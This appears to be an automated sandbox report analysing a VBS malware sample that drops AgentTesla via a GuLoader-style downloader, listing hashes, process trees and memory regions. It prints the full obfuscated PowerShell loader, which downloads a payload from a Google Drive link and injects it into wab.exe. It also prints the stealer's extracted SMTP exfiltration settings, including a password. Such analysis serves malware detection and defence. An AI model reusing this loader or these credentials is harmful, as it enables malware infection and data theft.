Analysis
-
max time kernel
146s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240319-en -
resource tags
arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system -
submitted
18-04-2024 01:57
Static task
static1
Behavioral task
behavioral1
Sample
26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c.vbs
Resource
win7-20240319-en
Behavioral task
behavioral2
Sample
26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c.vbs
Resource
win10v2004-20240412-en
General
-
Target
26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c.vbs
-
Size
210KB
-
MD5
cc706991e70caa76595bf08fc59bc6a1
-
SHA1
1172135bb6eafef9633db0ae5f818366a1515e8a
-
SHA256
26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c
-
SHA512
3528e82039587e51e9d2e96a99f76941e4077161a3782b3fe4fd0cb7d7f2125a0844554e77c6de7408a0ee3da02e487ec1746465c9f0a3c30222e78a1093e476
-
SSDEEP
6144:DYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfkqZD:A2dOB2mTJ
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.bresciagrameen.lk - Port:
587 - Username:
info@bresciagrameen.lk - Password:
#S413vT0u45# - Email To:
officejay@yandex.com
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 3 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 1932 WScript.exe 5 2984 powershell.exe 7 2984 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2180 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2560 powershell.exe 2180 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2560 set thread context of 2180 2560 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2984 powershell.exe 2560 powershell.exe 2560 powershell.exe 2180 wab.exe 2180 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2560 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2984 powershell.exe Token: SeDebugPrivilege 2560 powershell.exe Token: SeDebugPrivilege 2180 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 1932 wrote to memory of 2984 1932 WScript.exe powershell.exe PID 1932 wrote to memory of 2984 1932 WScript.exe powershell.exe PID 1932 wrote to memory of 2984 1932 WScript.exe powershell.exe PID 2984 wrote to memory of 2520 2984 powershell.exe cmd.exe PID 2984 wrote to memory of 2520 2984 powershell.exe cmd.exe PID 2984 wrote to memory of 2520 2984 powershell.exe cmd.exe PID 2984 wrote to memory of 2560 2984 powershell.exe powershell.exe PID 2984 wrote to memory of 2560 2984 powershell.exe powershell.exe PID 2984 wrote to memory of 2560 2984 powershell.exe powershell.exe PID 2984 wrote to memory of 2560 2984 powershell.exe powershell.exe PID 2560 wrote to memory of 2476 2560 powershell.exe cmd.exe PID 2560 wrote to memory of 2476 2560 powershell.exe cmd.exe PID 2560 wrote to memory of 2476 2560 powershell.exe cmd.exe PID 2560 wrote to memory of 2476 2560 powershell.exe cmd.exe PID 2560 wrote to memory of 2180 2560 powershell.exe wab.exe PID 2560 wrote to memory of 2180 2560 powershell.exe wab.exe PID 2560 wrote to memory of 2180 2560 powershell.exe wab.exe PID 2560 wrote to memory of 2180 2560 powershell.exe wab.exe PID 2560 wrote to memory of 2180 2560 powershell.exe wab.exe PID 2560 wrote to memory of 2180 2560 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gevandter = 1;$Versifiable='Substrin';$Versifiable+='g';Function Rivalitet($Slavistens){$Vitiliginous=$Slavistens.Length-$gevandter;For($Forndenhedernes=5; $Forndenhedernes -lt $Vitiliginous; $Forndenhedernes+=(6)){$Sandaflejringerne+=$Slavistens.$Versifiable.Invoke($Forndenhedernes, $gevandter);}$Sandaflejringerne;}function Snkloddene($Bypladser){& ($Pimple) ($Bypladser);}$Doweries=Rivalitet ' FlanM HearoSu jazridebiTe.milS riflFllesaDesti/.dvin5D,shf. Bact0Virks Un r(kvlstWOrdreiF.lisnPassed FlyvoGeno.wpamfisNonra NyansNOrdstT Befl Palat1jgers0Bech..Tumbl0Eeyu.;Nonra Tha aWAkantiTilgonCaque6 blon4Relib;Refer HighbxPla a6Tenzo4Mi.jk;Code, cen rBildrv uldv:Li.en1 Palp2 Test1snude.Cat,p0Fanat)Forva InterGVldese L,gocSkudlkHalvmo Trol/ I te2Dass,0Aubri1Rumpi0r.tio0Balle1 St e0 Becl1 H.nn BarkoFTi.maiTar,or Af ie.eritfEuryzoFiltex.nkek/Epico1Lymph2.nani1S.edi.Draws0Midsh ';$Overfondling=Rivalitet 'InterU E.sas Rec,e orflraltsa- svenATemp gSvmmeeDrinkn Un.otam.ly ';$Reshow=Rivalitet 'heelmhKa,ontBran tGaderpWildfs Misf:Bilob/G.niz/OrdstdWaffirClinoiAfpr.vRep teta,ke.VidergStikdoBlundoStemngExorclAppoie.rain.Veranc HestoKnudem Ldig/Se,rauFagm.cT,vyr?Da,apeSiliqxSa,cop UnproverrurTillitSilve=ElektdArresoEscorwTopafnProtel E eto tilgaAnimad Enri& ommicountdBeame=K,nto1FremdxHalvfJMaffil.kraaWApo,tR stenn Puls9Drue.kSljdmaSnf.sSFo.bioAnret6 My.h8BommeFTa tey ,relNDrageMT ansQTagudvPersol Kend6,ourw4S.linR MascXTids C OverMRacecEShadoeMnemobQuittPHindeZ Di,igglumm ';$Forbundsformanden=Rivalitet 'Circu>Indek ';$Pimple=Rivalitet 'dechriF.udae FormxAspir ';$Kathisma = Rivalitet '.bsene.aluscPy,pahUnre.o Cand Mlke% AdviaDominpTranspf,resdEftera Ac utE,itoaMaju,%Deval\CysteWPindboAugurm Ecphmc lorahjnenlGuttiaR nte. Aq.iG.uddilTvangyVolca A tim&Ops,i&Pre i .mproeFiss cSekunhPiscao Inte Trian$ouche ';Snkloddene (Rivalitet 'Nonar$ Emi.gTher lUdg.ao FlanbHypera Skovl Luft:BrachBMani.oA orem,esvabGigtreUspildYoutheSigna=Befoe(t angcN.tnimdestrdNyisg bagtr/wotanckvind Skalp$Ra,piKKons.aHemeltSca,bhMuscaiBegr.suds em .uroaFilmm)Advar ');Snkloddene (Rivalitet 'Udgif$PorengChesslF,oweoKrngebHoveda H lnlHulse:.ntrobGgesnaIn vid,alefoTrutsg,yllal Amali.uelloChack=Somac$AxileRMislieS gnis Tr nhUza ooPttofwGldes.Gas,rsUdkaapOpg vl,opmai KaratLeges(Card,$UnsnaF ForkoTransrStr.pbUngaruChausnMelledFlyvesBa krfScenoo ToilrNondomHammaatailonH lvidUdvkse PlacnBelee)Frei ');$Reshow=$badoglio[0];Snkloddene (Rivalitet 'Huiaa$ Bogog Ro,tl ArveoThickbUforkaJ.rdflO.lrs:Cua.iDAmpleeD tamcUn tai Modem UndeamindslCountf TritoAfbryrM,rtimDagsp2 Navn0 s.kt6 te,s=SanctNFornue Pho wKoag,- AnthOMorbib ForhjStr.feCompoc Pat.tLngse TospaS Bes.y Ethys InvitGenereDocummPaste.Merm.NUdhvneKulaitGlims.S ybiWInfane.odulbYawleCShitelBiomeiBarkaeSenionS,kketVldi, ');Snkloddene (Rivalitet 'klven$ SnigDWheree.yttecCr,isiGenanm.narta Forbl KulrfOv,rfoGnidnrAkkormSt,au2Figur0Anbe.6 B.gg.Wie eHFlyveeHypera BasidMatrieH,ererOverqs Outg[.luto$UngreOUdt yvArti.e.mpasrForrefFygedoLaengnMete,dBeundl Un.eiViduin DuvegMusca]Cruse=Milie$CoappDAgitpoStiftwSolbleComparStoleiSli.aeT.tussTaktr ');$coffeeweed=Rivalitet 'HaartDUide.euntemc,anmaiMaskimSchema.ninql mmigfPhenyoUlminr FolkmAu is2Konvu0For.a6 kyde.,sperD,alakolumpiwKrepon Tal.lDrejnoSt tsaPoisodLse,dFSkrmaiOrnamlSub oe Sc o(Apsid$ ibboRBur aeudenrsFagfohS,nuso Ba,rwCam,h,Borte$DreadR S ile.agskn ontrh HeateIrritdPrixbsLibidgMiljprOve uaca,ild Ochr) Gges ';$coffeeweed=$Bombede[1]+$coffeeweed;$Renhedsgrad=$Bombede[0];Snkloddene (Rivalitet 'Subfi$boli,gN.ntal Sat oRrknob,ardeaOpsiglPolyn:Ent,eNEmphau s ikkOveralUdadleSammeiH.spin Prdis dagsy.onunrUn caeTr dj=Mouss( WearTSk.mbe Bes,sPachatMorfi-E traPNedsiaJacquthumpbhNonse Ratte$ UndiR EvoleOkkupn Tn eh Gl,demop sdSeptisRepregHilderFolk aH,veddGodke) St e ');while (!$Nukleinsyre) {Snkloddene (Rivalitet 'Overs$an lygPebbllSeedyoSynlibvarteaBiddylMyres:VengeFTimefrK.mbup Frk eBlokbrF jlasProgrpIldste,nintkOverst DolliAlderv SkrusNedgr=Frin $ olyet Sk,fr Holdu F rle terl ') ;Snkloddene $coffeeweed;Snkloddene (Rivalitet ' TimeSPre,atDemataFug,er Pr ntVeeja-ForemSC,rysl Knuse AmpeeKompopBoule F,ber4Altng ');Snkloddene (Rivalitet ' Redu$StenggTankelZ.chio SanabIodimainfefl Calv:E levN,ndenu S,lvkScopelAutoceNeuroi Tu,anUnre sSc,nay ocir Yasmeracia=Colt.(Bah.iTUtidie StivsGang td,per-vi erPSensuaOverbtSmidih Lage Myrde$ Ko,nRGing,e eson ,porhS,rupeburrhdUnmetsSparogKa.rerN.gsla,nemod vige)Unfin ') ;Snkloddene (Rivalitet 'U adv$ RhingKlauslDe,enoNoncobDiacha Un.ulKvrul:Trsk FTitieiTje elJezeki ScursmiddltKonstrBlomseMeanw=Tykke$SpiongDaa,al Decio ,agabM,llya SirelDissi: exc,BSpikeicoatisPreposRemiteSemistBortv+Prehu+.onas%D.ske$Kolo bMenopaMunimdBetonoUnresg depul HaaniHidseo,eter.KysercPrinto tdpuuFo esnVagtttUtryg ') ;$Reshow=$badoglio[$Filistre];}Snkloddene (Rivalitet 'Karak$Setong malilRockeo Medlb No saServilRenaw:AutenSBin.stTillgeSolubd afsloBuks.rKare dBetonsFjerda KonvgFor,ltStikpiTrebegElexieu.embschrys El.ct=Betul GangaGEnogte KinktPrere-ProgrC SmrhoUnd rnRedsktorkeseKlvernSpectt Hype wate,$Ag osRTrolleJocoqn StonhTostaeZonopdfyrassMuldzg G,asrMata aSpinddUnecs ');Snkloddene (Rivalitet 'Rynke$ Svalg SocilIntero Lin,bUruguaAntiplBnhre:Age,eMGuffeiNighncChlamh SporeDyrlgl Con,l Chik Emiss= ,ndi reh.[ForelSLit ey Moo.sSimultIronieLacerm Euch.RefinC,lackoInc.en arrevBilabeBygnirSvovltSt.ko]Yacht:Skrum:,abovFOlivirSolenoU,dtam SkolBHabi aRo dbsFlgereOutro6Iso p4FuggiS.onint,nhonrSchooiGrundn Mic.g Vale( Sig,$ KoncSKlas,tHo lne PsykdSepp,o UdbrrBerridArylasSn.giaL.echgBe.tnt IndkiParaig wa.eeenglisWhats)Mysli ');Snkloddene (Rivalitet 'Merka$Li.pigVi,lll OuvroLedigbDemobaK.rtolPr,xi:BusavTAp enw LiszimoralganthrgGalloiBom.le DakssCounttKv.er Debar= Rela Role[ No.cS LdreyCas asI.dretPerv,e SjusmSkri .CamioTU,sheeForesximpertthgek.BetumEVas.enHideac usikobraisd To.ri Forpn FejlgIdol ]Antiq:gynae: PirrAfatemSPelodCEgoisIani aI nifo.UdaanG UnapeNo fetpseudS RepetH verrSmalbiAnomanpi tig Gumm(Rsonn$IndhaMNstekinondecLyspahBukseeBacbal TritlPyrom)Helau ');Snkloddene (Rivalitet 'Forld$SkabmgHospilR.tuaophenobCom,taDruntlFaths:TrappNKilotaPs,udtSk.ldu ikkerLithafBed to SpinrD sule c stkAppinoHornbmHo insCu.tstdisdes latl=Jarra$FliesT RebewHomogiRu legBrinegForbui Merce Dem,s AnlgtThrou.Topp sOvervu amtb Blits AnagtMartyrVis iiDemisnF.rhagRntge( Co.m3,perr2 Firs9E,pre3Sanit0Paape0Anve,,Udmrk2Jensk9Pub v2Unint0 Deli0Furb )Stand ');Snkloddene $Naturforekomsts;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Wommala.Gly && echo $"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gevandter = 1;$Versifiable='Substrin';$Versifiable+='g';Function Rivalitet($Slavistens){$Vitiliginous=$Slavistens.Length-$gevandter;For($Forndenhedernes=5; $Forndenhedernes -lt $Vitiliginous; $Forndenhedernes+=(6)){$Sandaflejringerne+=$Slavistens.$Versifiable.Invoke($Forndenhedernes, $gevandter);}$Sandaflejringerne;}function Snkloddene($Bypladser){& ($Pimple) ($Bypladser);}$Doweries=Rivalitet ' FlanM HearoSu jazridebiTe.milS riflFllesaDesti/.dvin5D,shf. Bact0Virks Un r(kvlstWOrdreiF.lisnPassed FlyvoGeno.wpamfisNonra NyansNOrdstT Befl Palat1jgers0Bech..Tumbl0Eeyu.;Nonra Tha aWAkantiTilgonCaque6 blon4Relib;Refer HighbxPla a6Tenzo4Mi.jk;Code, cen rBildrv uldv:Li.en1 Palp2 Test1snude.Cat,p0Fanat)Forva InterGVldese L,gocSkudlkHalvmo Trol/ I te2Dass,0Aubri1Rumpi0r.tio0Balle1 St e0 Becl1 H.nn BarkoFTi.maiTar,or Af ie.eritfEuryzoFiltex.nkek/Epico1Lymph2.nani1S.edi.Draws0Midsh ';$Overfondling=Rivalitet 'InterU E.sas Rec,e orflraltsa- svenATemp gSvmmeeDrinkn Un.otam.ly ';$Reshow=Rivalitet 'heelmhKa,ontBran tGaderpWildfs Misf:Bilob/G.niz/OrdstdWaffirClinoiAfpr.vRep teta,ke.VidergStikdoBlundoStemngExorclAppoie.rain.Veranc HestoKnudem Ldig/Se,rauFagm.cT,vyr?Da,apeSiliqxSa,cop UnproverrurTillitSilve=ElektdArresoEscorwTopafnProtel E eto tilgaAnimad Enri& ommicountdBeame=K,nto1FremdxHalvfJMaffil.kraaWApo,tR stenn Puls9Drue.kSljdmaSnf.sSFo.bioAnret6 My.h8BommeFTa tey ,relNDrageMT ansQTagudvPersol Kend6,ourw4S.linR MascXTids C OverMRacecEShadoeMnemobQuittPHindeZ Di,igglumm ';$Forbundsformanden=Rivalitet 'Circu>Indek ';$Pimple=Rivalitet 'dechriF.udae FormxAspir ';$Kathisma = Rivalitet '.bsene.aluscPy,pahUnre.o Cand Mlke% AdviaDominpTranspf,resdEftera Ac utE,itoaMaju,%Deval\CysteWPindboAugurm Ecphmc lorahjnenlGuttiaR nte. Aq.iG.uddilTvangyVolca A tim&Ops,i&Pre i .mproeFiss cSekunhPiscao Inte Trian$ouche ';Snkloddene (Rivalitet 'Nonar$ Emi.gTher lUdg.ao FlanbHypera Skovl Luft:BrachBMani.oA orem,esvabGigtreUspildYoutheSigna=Befoe(t angcN.tnimdestrdNyisg bagtr/wotanckvind Skalp$Ra,piKKons.aHemeltSca,bhMuscaiBegr.suds em .uroaFilmm)Advar ');Snkloddene (Rivalitet 'Udgif$PorengChesslF,oweoKrngebHoveda H lnlHulse:.ntrobGgesnaIn vid,alefoTrutsg,yllal Amali.uelloChack=Somac$AxileRMislieS gnis Tr nhUza ooPttofwGldes.Gas,rsUdkaapOpg vl,opmai KaratLeges(Card,$UnsnaF ForkoTransrStr.pbUngaruChausnMelledFlyvesBa krfScenoo ToilrNondomHammaatailonH lvidUdvkse PlacnBelee)Frei ');$Reshow=$badoglio[0];Snkloddene (Rivalitet 'Huiaa$ Bogog Ro,tl ArveoThickbUforkaJ.rdflO.lrs:Cua.iDAmpleeD tamcUn tai Modem UndeamindslCountf TritoAfbryrM,rtimDagsp2 Navn0 s.kt6 te,s=SanctNFornue Pho wKoag,- AnthOMorbib ForhjStr.feCompoc Pat.tLngse TospaS Bes.y Ethys InvitGenereDocummPaste.Merm.NUdhvneKulaitGlims.S ybiWInfane.odulbYawleCShitelBiomeiBarkaeSenionS,kketVldi, ');Snkloddene (Rivalitet 'klven$ SnigDWheree.yttecCr,isiGenanm.narta Forbl KulrfOv,rfoGnidnrAkkormSt,au2Figur0Anbe.6 B.gg.Wie eHFlyveeHypera BasidMatrieH,ererOverqs Outg[.luto$UngreOUdt yvArti.e.mpasrForrefFygedoLaengnMete,dBeundl Un.eiViduin DuvegMusca]Cruse=Milie$CoappDAgitpoStiftwSolbleComparStoleiSli.aeT.tussTaktr ');$coffeeweed=Rivalitet 'HaartDUide.euntemc,anmaiMaskimSchema.ninql mmigfPhenyoUlminr FolkmAu is2Konvu0For.a6 kyde.,sperD,alakolumpiwKrepon Tal.lDrejnoSt tsaPoisodLse,dFSkrmaiOrnamlSub oe Sc o(Apsid$ ibboRBur aeudenrsFagfohS,nuso Ba,rwCam,h,Borte$DreadR S ile.agskn ontrh HeateIrritdPrixbsLibidgMiljprOve uaca,ild Ochr) Gges ';$coffeeweed=$Bombede[1]+$coffeeweed;$Renhedsgrad=$Bombede[0];Snkloddene (Rivalitet 'Subfi$boli,gN.ntal Sat oRrknob,ardeaOpsiglPolyn:Ent,eNEmphau s ikkOveralUdadleSammeiH.spin Prdis dagsy.onunrUn caeTr dj=Mouss( WearTSk.mbe Bes,sPachatMorfi-E traPNedsiaJacquthumpbhNonse Ratte$ UndiR EvoleOkkupn Tn eh Gl,demop sdSeptisRepregHilderFolk aH,veddGodke) St e ');while (!$Nukleinsyre) {Snkloddene (Rivalitet 'Overs$an lygPebbllSeedyoSynlibvarteaBiddylMyres:VengeFTimefrK.mbup Frk eBlokbrF jlasProgrpIldste,nintkOverst DolliAlderv SkrusNedgr=Frin $ olyet Sk,fr Holdu F rle terl ') ;Snkloddene $coffeeweed;Snkloddene (Rivalitet ' TimeSPre,atDemataFug,er Pr ntVeeja-ForemSC,rysl Knuse AmpeeKompopBoule F,ber4Altng ');Snkloddene (Rivalitet ' Redu$StenggTankelZ.chio SanabIodimainfefl Calv:E levN,ndenu S,lvkScopelAutoceNeuroi Tu,anUnre sSc,nay ocir Yasmeracia=Colt.(Bah.iTUtidie StivsGang td,per-vi erPSensuaOverbtSmidih Lage Myrde$ Ko,nRGing,e eson ,porhS,rupeburrhdUnmetsSparogKa.rerN.gsla,nemod vige)Unfin ') ;Snkloddene (Rivalitet 'U adv$ RhingKlauslDe,enoNoncobDiacha Un.ulKvrul:Trsk FTitieiTje elJezeki ScursmiddltKonstrBlomseMeanw=Tykke$SpiongDaa,al Decio ,agabM,llya SirelDissi: exc,BSpikeicoatisPreposRemiteSemistBortv+Prehu+.onas%D.ske$Kolo bMenopaMunimdBetonoUnresg depul HaaniHidseo,eter.KysercPrinto tdpuuFo esnVagtttUtryg ') ;$Reshow=$badoglio[$Filistre];}Snkloddene (Rivalitet 'Karak$Setong malilRockeo Medlb No saServilRenaw:AutenSBin.stTillgeSolubd afsloBuks.rKare dBetonsFjerda KonvgFor,ltStikpiTrebegElexieu.embschrys El.ct=Betul GangaGEnogte KinktPrere-ProgrC SmrhoUnd rnRedsktorkeseKlvernSpectt Hype wate,$Ag osRTrolleJocoqn StonhTostaeZonopdfyrassMuldzg G,asrMata aSpinddUnecs ');Snkloddene (Rivalitet 'Rynke$ Svalg SocilIntero Lin,bUruguaAntiplBnhre:Age,eMGuffeiNighncChlamh SporeDyrlgl Con,l Chik Emiss= ,ndi reh.[ForelSLit ey Moo.sSimultIronieLacerm Euch.RefinC,lackoInc.en arrevBilabeBygnirSvovltSt.ko]Yacht:Skrum:,abovFOlivirSolenoU,dtam SkolBHabi aRo dbsFlgereOutro6Iso p4FuggiS.onint,nhonrSchooiGrundn Mic.g Vale( Sig,$ KoncSKlas,tHo lne PsykdSepp,o UdbrrBerridArylasSn.giaL.echgBe.tnt IndkiParaig wa.eeenglisWhats)Mysli ');Snkloddene (Rivalitet 'Merka$Li.pigVi,lll OuvroLedigbDemobaK.rtolPr,xi:BusavTAp enw LiszimoralganthrgGalloiBom.le DakssCounttKv.er Debar= Rela Role[ No.cS LdreyCas asI.dretPerv,e SjusmSkri .CamioTU,sheeForesximpertthgek.BetumEVas.enHideac usikobraisd To.ri Forpn FejlgIdol ]Antiq:gynae: PirrAfatemSPelodCEgoisIani aI nifo.UdaanG UnapeNo fetpseudS RepetH verrSmalbiAnomanpi tig Gumm(Rsonn$IndhaMNstekinondecLyspahBukseeBacbal TritlPyrom)Helau ');Snkloddene (Rivalitet 'Forld$SkabmgHospilR.tuaophenobCom,taDruntlFaths:TrappNKilotaPs,udtSk.ldu ikkerLithafBed to SpinrD sule c stkAppinoHornbmHo insCu.tstdisdes latl=Jarra$FliesT RebewHomogiRu legBrinegForbui Merce Dem,s AnlgtThrou.Topp sOvervu amtb Blits AnagtMartyrVis iiDemisnF.rhagRntge( Co.m3,perr2 Firs9E,pre3Sanit0Paape0Anve,,Udmrk2Jensk9Pub v2Unint0 Deli0Furb )Stand ');Snkloddene $Naturforekomsts;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Wommala.Gly && echo $"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD536bd487545db71f52f4d1268b1018514
SHA116b31bad0faba294b2b7d163a4da9af1aba93423
SHA256e4f9f8579cd7ad06b33ed98b7ca48b79cec786fa110e58a66c29669f741c4f89
SHA512d11837be3adc8df8de0fc0bf54c86d77e206eb37876550d925666d44badcb9132b1f2aa9919448e40e39e477f9cdf1569e73d0938d6e7f74981a72d92b0173a8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XP9363EIQG3YCD1J3MN7.tempFilesize
7KB
MD5dd7f9c7261122e744e4c22ffafff0964
SHA171cfba8e51742d02c730303ab40823a10f91aa79
SHA2565c068278d2ad9a1ba90e6cc084f7cf2355156d023428758716bb21f3446c7953
SHA51276569d4f6bd8a227eddec2f94d9a84953f89117a5c7f68a2754afff9eb6b60c58582acae958682d4dd91d484e2846626be5c22ca4cc3c2ac22ac760712c0eac3
-
C:\Users\Admin\AppData\Roaming\Wommala.GlyFilesize
466KB
MD5857ebc337f5b8e4103e4ba6bb5eac6b6
SHA1fc0153dd335c59293a2a2fb3455fb05b59253bd2
SHA256fbef3e8ddfb38a27db63e01cd92e02a59b163f6088ced67c3e4b01f16c5e53e2
SHA512b26df0793d9763e9e88bd59e34a5187d7b48101a91647b312b8212b15ab7227327df7913f0c03dd2c9cfff4cb1c99c4846cf88431e09ffe9cdfcc201e9f304f5
-
memory/2180-91-0x00000000009B0000-0x00000000009F2000-memory.dmpFilesize
264KB
-
memory/2180-90-0x000000006E790000-0x000000006EE7E000-memory.dmpFilesize
6.9MB
-
memory/2180-54-0x0000000001A20000-0x0000000002B19000-memory.dmpFilesize
17.0MB
-
memory/2180-85-0x0000000076EA0000-0x0000000076F76000-memory.dmpFilesize
856KB
-
memory/2180-84-0x00000000009B0000-0x0000000001A12000-memory.dmpFilesize
16.4MB
-
memory/2180-83-0x0000000001A20000-0x0000000002B19000-memory.dmpFilesize
17.0MB
-
memory/2180-92-0x0000000020C20000-0x0000000020C60000-memory.dmpFilesize
256KB
-
memory/2180-95-0x000000006E790000-0x000000006EE7E000-memory.dmpFilesize
6.9MB
-
memory/2180-96-0x0000000020C20000-0x0000000020C60000-memory.dmpFilesize
256KB
-
memory/2180-58-0x00000000009B0000-0x0000000001A12000-memory.dmpFilesize
16.4MB
-
memory/2180-57-0x0000000076EA0000-0x0000000076F76000-memory.dmpFilesize
856KB
-
memory/2180-56-0x0000000076ED6000-0x0000000076ED7000-memory.dmpFilesize
4KB
-
memory/2180-55-0x0000000076CB0000-0x0000000076E59000-memory.dmpFilesize
1.7MB
-
memory/2560-35-0x00000000025B0000-0x00000000025F0000-memory.dmpFilesize
256KB
-
memory/2560-87-0x0000000006030000-0x0000000007129000-memory.dmpFilesize
17.0MB
-
memory/2560-43-0x00000000050B0000-0x00000000050B1000-memory.dmpFilesize
4KB
-
memory/2560-44-0x0000000006030000-0x0000000007129000-memory.dmpFilesize
17.0MB
-
memory/2560-45-0x0000000072CF0000-0x000000007329B000-memory.dmpFilesize
5.7MB
-
memory/2560-46-0x00000000025B0000-0x00000000025F0000-memory.dmpFilesize
256KB
-
memory/2560-47-0x0000000006030000-0x0000000007129000-memory.dmpFilesize
17.0MB
-
memory/2560-50-0x0000000005BD0000-0x0000000005CD0000-memory.dmpFilesize
1024KB
-
memory/2560-51-0x0000000076CB0000-0x0000000076E59000-memory.dmpFilesize
1.7MB
-
memory/2560-52-0x0000000076EA0000-0x0000000076F76000-memory.dmpFilesize
856KB
-
memory/2560-53-0x0000000006030000-0x0000000007129000-memory.dmpFilesize
17.0MB
-
memory/2560-41-0x00000000025B0000-0x00000000025F0000-memory.dmpFilesize
256KB
-
memory/2560-42-0x0000000005BD0000-0x0000000005CD0000-memory.dmpFilesize
1024KB
-
memory/2560-86-0x0000000072CF0000-0x000000007329B000-memory.dmpFilesize
5.7MB
-
memory/2560-31-0x0000000072CF0000-0x000000007329B000-memory.dmpFilesize
5.7MB
-
memory/2560-32-0x00000000025B0000-0x00000000025F0000-memory.dmpFilesize
256KB
-
memory/2560-33-0x00000000025B0000-0x00000000025F0000-memory.dmpFilesize
256KB
-
memory/2984-34-0x000007FEF5030000-0x000007FEF59CD000-memory.dmpFilesize
9.6MB
-
memory/2984-21-0x000000001B270000-0x000000001B552000-memory.dmpFilesize
2.9MB
-
memory/2984-37-0x00000000028E0000-0x0000000002960000-memory.dmpFilesize
512KB
-
memory/2984-38-0x00000000028E0000-0x0000000002960000-memory.dmpFilesize
512KB
-
memory/2984-39-0x00000000028E0000-0x0000000002960000-memory.dmpFilesize
512KB
-
memory/2984-40-0x00000000028E0000-0x0000000002960000-memory.dmpFilesize
512KB
-
memory/2984-88-0x000007FEF5030000-0x000007FEF59CD000-memory.dmpFilesize
9.6MB
-
memory/2984-26-0x00000000028E0000-0x0000000002960000-memory.dmpFilesize
512KB
-
memory/2984-25-0x000007FEF5030000-0x000007FEF59CD000-memory.dmpFilesize
9.6MB
-
memory/2984-24-0x00000000028E0000-0x0000000002960000-memory.dmpFilesize
512KB
-
memory/2984-23-0x000007FEF5030000-0x000007FEF59CD000-memory.dmpFilesize
9.6MB
-
memory/2984-22-0x00000000023A0000-0x00000000023A8000-memory.dmpFilesize
32KB